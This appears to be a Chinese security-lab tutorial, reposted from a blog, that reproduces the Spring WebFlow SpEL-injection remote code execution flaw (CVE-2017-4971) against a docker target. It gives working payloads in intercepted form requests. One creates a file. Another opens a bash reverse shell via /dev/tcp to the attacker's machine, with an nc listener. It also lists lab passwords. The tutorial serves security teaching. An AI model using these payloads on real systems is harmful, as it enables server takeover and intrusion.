文章总结: 本文档详述了SpringWebFlow远程代码执行漏洞CVE-2017-4971的原理与复现。该漏洞因数据绑定未限制属性导致SpEL表达式注入,可造成任意命令执行。实验演示了通过修改表单请求包进行文件创建和反弹shell的具体步骤,强调了框架安全防护的重要性。 综合评分: 86 文章分类: 渗透测试,漏洞分析,WEB安全,漏洞POC
网安实验干货每日分享Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)-0130
原创
建哥聊安全 建哥聊安全
建哥聊安全
2026年1月30日 10:24 湖南
Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)
实验目的
通过本实验,掌握Spring WebFlow 远程代码执行漏洞原理和利用方法,加深了解Spring WebFlow框架。
实验环境
·操作机:Win10 用户名:Administrator 密码:Sangfor!7890
·操作机:kali 用户名:root 密码:Sangfor!7890
·靶机:Ubuntu + docker 用户名:root 密码:Sangfor!7890
·实验地址:http://ip:8080/login(Spring框架需搭建)
实验原理
由于Spring的框架越来越多,而且后面引入了SpringEl作为默认的表达式解析方式,所以一旦引入了类似于OGNL的表达式,很可能会带来一些安全问题。本次漏洞就是由于Spring WebFlow是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
漏洞介绍 该漏洞在2017年5月31号被提交到https://pivotal.io/security/cve-2017-4971平台,官方并没有详细的信息,通过官方描述和补丁的对比,我们可以大致推断应该是Spring WebFlow在Model的数据绑定上面,由于没有明确指定相关model的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞,这个漏洞利用除了版本的限制之外还有两个前置条件,这两个前置条件中有一个是默认配置,另外一个就是编码规范了,漏洞能不能利用成功主要就取决于后面的条件。
实验步骤
第一步启动目标靶机的环境
1、登录”Spring WebFlow”靶机,执行如下命令,进入目标环境所在目录
cd /vulhub-master
cd spring
cd CVE-2017-4971
2、执行以下命令,运行目标靶机的环境
docker-compose up -d
3、登录“Attack”操作机,打开浏览器,访问http://靶机ip:8080,看到酒店预订页面,说明靶机环境启动成功
第二步漏洞复现
4、通过“Attack”操作机的浏览器访问http://靶机ip:8080,看到登录页面
5、用页面左边给出的任意一个账号/密码登录网站
6、访问id为1的酒店http://靶机ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步WebFlow就正式开始了)
7、打开桌面的的“Burp”文件夹,双击“BURP.cmd”启动Burp Suite抓包工具
8、切换到“Proxy”代理模块的“Options”,查看Bp的代理
9、切换到浏览器,选择火狐插件中的代理(配置浏览器的的代理),与Bp的代理一致
10、点击确认“Confirm”按钮,确认酒店预订信息,Bp成功抓取数据包,然后将数据包send to repeater
11、修改数据包,加入要执行的代码,然后发送数据包,会返回500的状态码(注意:一定要URL编码,即new+java.lang.ProcessBuilder)
创建文件POC
_(new java.lang.ProcessBuilder(“touch”,”/tmp/success”)).start()=sy
验证文件是否创建成功
12、进入靶机服务器,在docker靶机里可以看到已经在/tmp目录下成功创建了success文件(注意:是进入docker里) ,执行如下命令
docker ps 查看靶机环境对应的docker容器ID
docker exec -it 容器ID bash 进入docker环境
cd /tmp 进入tmp目录
ls 查看文件
反弹shell
13、首先在kali输入以下命令来监听端口
nc -l -p 21
14、修改数据包,输入POC【_(new java.lang.ProcessBuilder(“bash”,”-c”,“bash -i >& /dev/tcp/【kali攻击机ip】/21 0>&1”)).start()=sy】反弹shell
15、获得shell,可以执行系统命令
实验总结
通过本实验,对Spring WebFlow框架进行远程代码执行,成功向服务器写入文件,并执行相关命令反弹shell,深入了解远程代码执行漏洞的危害。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:建哥聊安全 建哥聊安全 建哥聊安全《网安实验干货每日分享Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)-0130》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论